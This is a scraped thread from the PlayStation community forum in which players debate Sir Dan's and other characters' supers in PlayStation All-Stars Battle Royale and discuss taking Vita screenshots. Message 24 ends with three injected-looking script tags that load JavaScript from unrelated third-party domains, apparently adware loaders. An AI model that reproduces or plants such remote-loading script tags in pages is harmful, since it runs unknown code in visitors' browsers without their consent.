Play For Fun!
Message 21 of 48 (251 Views)
0 Likes
Uncharted Territory
1735 posts

Re: Toro, Radec, Parappa, you got NOTHING on Sir Dan

Dec 21, 2012

pedro702 wrote:

really braging for winning with a score of 5? i mean it really isnt that great of a win and doesnt make sir dan any better

I once got 2 kills and 1 death, and I still somehow won the match.

Message 22 of 48 (248 Views)
0 Likes
I Only Post Everything
1147 posts

[ Edited ]
Dec 21, 2012

I can't get the screenshot thing to work. Smiley Sad

Edit: I'm guessing it's just a Vita feature.

Message 23 of 48 (242 Views)
0 Likes
Gaming Beast
2167 posts

[ Edited ]
Dec 21, 2012

pedro702 wrote:

Fromundaman wrote:

pedro702 wrote:

if you can name one char that plays worse than sir dan go ahead becuase he is realy the worst  so far and like people said winning a match proves nothing at all we all know kratos raiden and sly are top tier and i can win against them with radec or spike  and that doesnt make them better than them at all sir dan has the worst  supers and spike comes in to the second worst since his supers are also preety weak but sir dan has a much harder time because some stages make his lvl 2 and 3 preety useless and his lvl1 isnt that easy to land either

Wow, there is so much misinformation in this post... I assume you only play FFA. It's the only way to justify this post.

nope since you can tech out of sir dan lvl 1 you know? if you press down left or right when you get hit with the arrow you wont be hit his his lvl 1  so he really doesnt have any combo into lvl 1 confirm for 1vs1

Yes, that is about the only correct thing you've said (Also down is the only correct one. For the other two he can just wait a second and react to where you tech then super.), although he has setups for but mostly it's used as an anti-air. Not saying it's a good super, but it does have uses.

What I was actually referring to was saying that Kratos, Raiden and Sly are top tier. Raiden is the only one who might be in the upper tiers of that list and he's still more-so over-used than broken. There are quite a few characters that shut him down, and it's not like he has an instant half-screen punisher that deals a crumple and has super armor that is also safe on block like a certain other character...

Also Spike can combo into his level 1 and 2, both can be used to punish whiffs and they're relatively cheap. Oh and his level 1 is also a decent anti-air. Now compare this to say, Big Daddy's level 1, or Radec's level 1 (Which is worthless outside of FFA and even then it only works because FFA players tend to be distracted. It can be somewhat useful in teams if your partner can hold them still, but that's it.), Kratos' supers in general (Again, only really useful in FFA. Limited usefulness in 1v1/2v2 but at least he can kinda combo into level 1 and level 2 punishes landings.), Ratchet's level 2 & 3, Heihachi's 2 & 3, Toro's 2 & 3, Jak's level 1 & 2 or Nariko's 1 & 2. Spike may not have the best supers, but to say they're worse than all of the above? Nah... Especially not poor Nariko's. Not to say all of those supers are bad, but in both 1v1 or 2v2, Spike's supers are better than any of those above if you know how those characters work/how to dodge/stop them.

Also Dan can be a pain in the **bleep** to fight against in 1v1.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 24 of 48 (234 Views)
0 Likes
Hekseville Citizen
282 posts

Dec 21, 2012

PinaChronic wrote:
It was a hard match. Yeah, it wasn't a lot of kills, but most games that are really competitive will come down to the wire like that... But plain and simple, this shows that sir Dan can outplay almost anyone.

what belt are you / the opponents

Check out my channel for Combo Videos and Tournament matches!
www.youtube.com/mogilsumi
Message 25 of 48 (227 Views)
0 Likes
Wastelander
768 posts

Dec 21, 2012

Fromundaman wrote:

pedro702 wrote:

Fromundaman wrote:

pedro702 wrote:

if you can name one char that plays worse than sir dan go ahead becuase he is realy the worst  so far and like people said winning a match proves nothing at all we all know kratos raiden and sly are top tier and i can win against them with radec or spike  and that doesnt make them better than them at all sir dan has the worst  supers and spike comes in to the second worst since his supers are also preety weak but sir dan has a much harder time because some stages make his lvl 2 and 3 preety useless and his lvl1 isnt that easy to land either

Wow, there is so much misinformation in this post... I assume you only play FFA. It's the only way to justify this post.

nope since you can tech out of sir dan lvl 1 you know? if you press down left or right when you get hit with the arrow you wont be hit his his lvl 1  so he really doesnt have any combo into lvl 1 confirm for 1vs1

Yes, that is about the only correct thing you've said (Also down is the only correct one. For the other two he can just wait a second and react to where you tech then super.), although he has setups for but mostly it's used as an anti-air. Not saying it's a good super, but it does have uses.

What I was actually referring to was saying that Kratos, Raiden and Sly are top tier. Raiden is the only one who might be in the upper tiers of that list and he's still more-so over-used than broken. There are quite a few characters that shut him down, and it's not like he has an instant half-screen punisher that deals a crumple and has super armor that is also safe on block like a certain other character...

Also Spike can combo into his level 1 and 2, both can be used to punish whiffs and they're relatively cheap. Oh and his level 1 is also a decent anti-air. Now compare this to say, Big Daddy's level 1, or Radec's level 1 (Which is worthless outside of FFA and even then it only works because FFA players tend to be distracted. It can be somewhat useful in teams if your partner can hold them still, but that's it.), Kratos' supers in general (Again, only really useful in FFA. Limited usefulness in 1v1/2v2 but at least he can kinda combo into level 1 and level 2 punishes landings.), Ratchet's level 2 & 3, Heihachi's 2 & 3, Toro's 2 & 3, Jak's level 1 & 2 or Nariko's 1 & 2. Spike may not have the best supers, but to say they're worse than all of the above? Nah... Especially not poor Nariko's. Not to say all of those supers are bad, but in both 1v1 or 2v2, Spike's supers are better than any of those above if you know how those characters work/how to dodge/stop them.

Also Dan can be a pain in the **bleep** to fight against in 1v1.

kratos has a really good reach and gains a preety fast he not only good in FFA at all same for sly  since that counter really pisses me off and the almost no interuptable lvl1 helps him alot, kratos has some ways to combo into its lvl 1 so i why its limited on 1vs1? and his lvl 2 is preety easy to combo with since most chars lvl 2 will only kill you once in 1vs1 if your not called raiden, kratos supers arent that bad at all in 1vs1 since he has some ways to combo into them and his reach for gaining ap is preety good

most of spike combo into lvl 1 are either  very timming related like the air down triangle  or you have a noob oponent with neutral triangle and the full charged glove  ont he ground  and spike lvl 2 wishes it was like radecs since radec lvl 2 is much faster and longer duration hits all the way trough and not on the slash only and doesnt disapear when hitting a stage part and spike lvl3  is really offputting i do use spike alot he gains ap nicely but his supers  could have been much better really

looking at everyones supers i see spike and sir dan having the worst supers overall every other chars has a very nicer set of them

Message 26 of 48 (222 Views)
0 Likes
Hekseville Citizen
295 posts

Dec 21, 2012

Levi_Skardsen wrote:

I can't get the screenshot thing to work. Smiley Sad

Edit: I'm guessing it's just a Vita feature.

It is a Vita feature.

Message 27 of 48 (203 Views)
0 Likes
Uncharted Territory
1266 posts

Dec 21, 2012

achus93again wrote:
Sir Dan is beast!
my second main, behind Cole!

Same here.

photo Vigor_murder_of_crows_zps5759709e.gif
Message 28 of 48 (197 Views)
0 Likes
Hekseville Citizen
335 posts

Dec 21, 2012

test!!.jpg

Here is a good picture of Sir Dan in action. This game was a ranked match, post-patch (meaning Sackboy wasn't imba), and on the giant twisted metal map Smiley Very Happy

Message 29 of 48 (182 Views)
0 Likes
Hekseville Citizen
295 posts

[ Edited ]
Dec 21, 2012

chunky_shtew wrote:

test!!.jpg

Here is a good picture of Sir Dan in action. This game was a ranked match, post-patch (meaning Sackboy wasn't imba), and on the giant twisted metal map Smiley Very Happy

Next time, press simultaneously the PS button and the Start button. That should give you a screenshot.

Message 30 of 48 (179 Views)